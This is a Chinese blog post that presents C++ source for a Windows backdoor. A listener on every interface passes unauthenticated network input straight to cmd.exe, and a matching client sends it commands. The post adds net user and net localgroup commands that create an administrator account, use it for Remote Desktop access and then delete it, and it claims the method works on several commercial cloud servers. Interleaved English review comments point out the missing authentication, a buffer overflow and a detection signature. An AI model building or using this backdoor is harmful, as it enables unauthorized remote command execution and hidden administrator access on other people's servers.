1.前言
最近在做一个节点信息收集的时候，偶然想到一种可以进入服务器的方法，这里记录下：需要先运行服务器端程序，再通过客户端来添加帐号、提升权限、删除帐号等操作
2.思路
1.做一个可以远程执行命令行的程序
2.通过命令行增加一个新帐号,提升为admin权限,通过微软远程进入,做完后,在服务器上注销账号,通过命令行删除用户,结束
3.我购买了一台阿里云,百度云,腾讯云,华为云这种方法都可以轻松进入
3.具体实现
服务器端部分程序
// Runs one caller-supplied command line through "Cmd.exe /C" and appends the
// child's combined stdout/stderr to strrecv.
// Returns true only if at least one ReadFile on the pipe succeeded; false when
// the pipe or the process could not be created, or nothing could be read.
//
// Security note (review): strcmd reaches cmd.exe verbatim — no validation, no
// allow-list. In PortTransfer_2 below the argument is the raw byte string taken
// off the network socket, so whoever can reach the listening port picks the command.
bool ExecCmdRet(const std::string &strcmd, std::string &strrecv)
{
SECURITY_ATTRIBUTES sa;
HANDLE hRead,hWrite;
bool bret = false;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
// Both pipe ends are created inheritable; the write end becomes the child's
// stdout/stderr below.
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
return bret;
// BUG (review): no length check. "Cmd.exe /C " is 11 bytes, so any strcmd longer
// than 1012 bytes overflows szcommand; the caller in this listing can hand in up
// to 1023 bytes (one recv of 1023).
char szcommand[1024] = {0};
strcpy(szcommand,"Cmd.exe /C ");
strcat(szcommand,strcmd.c_str());
STARTUPINFOA si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFOA);
GetStartupInfoA(&si);
// Redirect the child's stdout and stderr into the pipe and hide its window.
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
// lpApplicationName is NULL, so "Cmd.exe" is resolved through the normal search
// path; bInheritHandles is TRUE so the child receives the pipe handles.
if (!CreateProcessA(NULL, szcommand, NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
CloseHandle(hWrite);
CloseHandle(hRead);
return bret;
}
// Drop the parent's write end so ReadFile reports EOF once the child's copy closes.
CloseHandle(hWrite);
char buffer[4096] = {0};
DWORD bytesRead;
// Waits up to 10 s for the child before draining the pipe; the wait result is
// ignored. A child that fills the pipe buffer earlier just blocks until the read
// loop below starts, which adds up to 10 s of latency.
WaitForSingleObject(pi.hProcess, 10000);
while (ReadFile(hRead,buffer,4095,&bytesRead,NULL))
{
// At most 4095 bytes were read, so the terminator stays inside the buffer.
buffer[bytesRead] = '\0';
strrecv += buffer;
bret = true;
}
CloseHandle(hRead);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return bret;
}
// Thread entry: serves exactly one client connection popped from the shared
// TransferParam queue. Reads one chunk (up to 1023 bytes), runs it through
// ExecCmdRet, sends back the output (or "null" when there was none), then
// closes the socket. Always returns 0.
// TransferParam, DataSend and ExecCmdRet are declared elsewhere.
//
// Security note (review): there is no authentication, message framing or peer
// check anywhere on this path — the received bytes are handed to cmd.exe as-is.
DWORD WINAPI PortTransfer_2(LPVOID lParam)
{
// lParam is the acceptor's stack-allocated ConfigInfo (see begcom), shared by
// every worker thread; Pop() presumably hands each thread a distinct socket — verify.
TransferParam *ConfigInfo = (TransferParam*)lParam;
// ServerSock is declared but never used in this function.
SOCKET ClientSock, ServerSock = INVALID_SOCKET;
ClientSock = ConfigInfo->LocalData.Pop();
fd_set Fd_Read;
// nRecv is declared but never used.
int ret, nRecv;
while(1)
{
FD_ZERO(&Fd_Read);
FD_SET(ClientSock, &Fd_Read);
// Winsock ignores the first argument; a NULL timeout blocks until readable or error.
ret = select(0, &Fd_Read, NULL, NULL, NULL);
if(ret <= 0)
break;
if(FD_ISSET(ClientSock, &Fd_Read))
{
std::string strrecvdata("");
int iResult = 0;
char szbuf[1024] = {0};
// Single recv: only the first chunk that arrives is used; the connection is
// closed after the reply, so a request split across segments is truncated.
iResult = recv(ClientSock, szbuf, 1023, 0);
if (iResult > 0)
{
szbuf[iResult] = '\0';
// Appended as a C string, so an embedded NUL truncates the data.
strrecvdata += szbuf;
}
else
break;   // 0 = peer closed, SOCKET_ERROR = failure
std::string strsenddata("");
if (!strrecvdata.empty())
ExecCmdRet(strrecvdata, strsenddata);
if (strsenddata.empty())
strsenddata = "null";
// strsenddata is never empty here, so this branch always runs and the loop
// always ends after one request. DataSend's return value is stored but unused.
if (!strsenddata.empty())
{
int nsize = strsenddata.size();
ret = DataSend(ClientSock, strsenddata.c_str(), nsize);
break;
}
}
}
closesocket(ClientSock);
return 0;
}
// Acceptor loop: creates a listening TCP socket on 0.0.0.0:nsrcport and spawns
// one PortTransfer_2 thread per accepted connection. Returns when the listening
// socket cannot be created or accept() fails.
// CreateSocket, TransferParam, ADDRSIZE and the global mapSockIp are declared
// elsewhere.
//
// Security note (review): the listener is bound to every interface and accepts
// any peer; together with PortTransfer_2 this is remote, unauthenticated command
// execution. On a host the observable signature is this process holding a
// listening socket on an arbitrary port and repeatedly spawning hidden
// cmd.exe children.
void begcom(int nsrcport)
{
WSADATA wsd;
WORD sockVersion = MAKEWORD(2, 2);
WSAStartup(sockVersion, &wsd);   // return value ignored
SOCKET srcSocket = CreateSocket(inet_addr("0.0.0.0"), nsrcport);
// NOTE(review): SOCKET is unsigned on Win32, so "<= 0" only catches 0; an
// INVALID_SOCKET (~0) result would pass this check unless CreateSocket returns
// 0 on failure — confirm against its definition.
if(srcSocket <= 0)
return;
// One ConfigInfo on this stack frame is shared by pointer with every worker thread.
TransferParam ConfigInfo;
sprintf_s(ConfigInfo.GlobalData.szIP, ADDRSIZE, "%s", "0.0.0.0");
ConfigInfo.GlobalData.wPort = nsrcport;
while(1)
{
SOCKADDR_IN addr;
int addrlen = sizeof(addr);
SOCKET AcceptSocket = accept(srcSocket, (sockaddr*)&addr, &addrlen);
// accept() fails with INVALID_SOCKET; comparing against SOCKET_ERROR (-1)
// works only because -1 converts to the same all-ones SOCKET value.
if (AcceptSocket == SOCKET_ERROR)
break;
char szclientip[64] = {0};
// Record the peer address keyed by socket. mapSockIp is written from this
// thread only; no reader is visible in this listing.
strcpy(szclientip,inet_ntoa(addr.sin_addr));
mapSockIp[AcceptSocket] = szclientip;
// Hand the socket to the next worker; how Push/Pop pair up across threads is
// whatever TransferParam::LocalData implements — not visible here.
ConfigInfo.LocalData.Push(AcceptSocket);
DWORD dwThreadId = 0;
// dwCreationFlags is passed as NULL (i.e. 0), so the thread runs immediately.
// The handle is closed right away and the thread is never joined.
HANDLE hThread = CreateThread(NULL, 0, PortTransfer_2, (LPVOID)&ConfigInfo, NULL, &dwThreadId);
if(hThread)
CloseHandle(hThread);
else
Sleep(1000);   // thread creation failed: back off; the pushed socket stays queued
}
closesocket(srcSocket);
WSACleanup();
}
客户端程序部分代码
// Client side: opens a TCP connection to strip:nport, sends strsenddata once,
// then collects everything the peer returns until recv reports 0 or an error.
// Returns the collected bytes; an empty string on any socket/connect failure.
// Failures of WSAStartup, send and setsockopt are not distinguished from
// "the peer sent nothing".
std::string getnodeinfo(const std::string &strip, int nport, const std::string &strsenddata)
{
std::string strrecvdata("");
WSADATA wsd;
SOCKET m_sockKeep = INVALID_SOCKET;
WORD sockVersion = MAKEWORD(2, 2);
WSAStartup(sockVersion, &wsd);
// do/while(0) gives the early-exit breaks a single cleanup point below.
do
{
struct sockaddr_in sa ;
m_sockKeep = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
if (m_sockKeep == INVALID_SOCKET)
break;
sa.sin_family = AF_INET;
sa.sin_port = htons (nport);
// inet_addr accepts dotted-quad only; a hostname yields INADDR_NONE and the
// connect below fails.
sa.sin_addr.S_un.S_addr = inet_addr (strip.c_str());
if( connect(m_sockKeep, (SOCKADDR *) &sa, sizeof (sa)) == -1)
break;
// Single send; a short send (nret < size) is treated as success.
int nret = send(m_sockKeep, strsenddata.c_str(), strsenddata.size(), 0);
if (nret != SOCKET_ERROR)
{
int iResult = 0;
do
{
char szbuf[4096] = {0};
iResult = recv(m_sockKeep, szbuf, 4095, 0);
if (iResult > 0)
{
szbuf[iResult] = '\0';
// Appended as a C string, so an embedded NUL truncates the chunk.
strrecvdata += szbuf;
// The 500 ms receive timeout is installed only after the first chunk
// arrives, so the first recv can block indefinitely; setsockopt's
// result is ignored.
int nNetTimeout = 500;
setsockopt(m_sockKeep, SOL_SOCKET, SO_RCVTIMEO, (char *)&nNetTimeout, sizeof(int));
}
} while (iResult > 0);
}
} while (0);
// Runs even when m_sockKeep is still INVALID_SOCKET; closesocket then just fails.
closesocket(m_sockKeep);
WSACleanup();
return strrecvdata;
}
需要执行的远程命令
net user zrq zrq1986% /add
net localgroup administrators zrq /add
net user zrq /delete
4.备注
1.在windows server2008 系统下注入后正常进入
2.http://download.csdn.net/detail/zhang_ruiqiang/9715665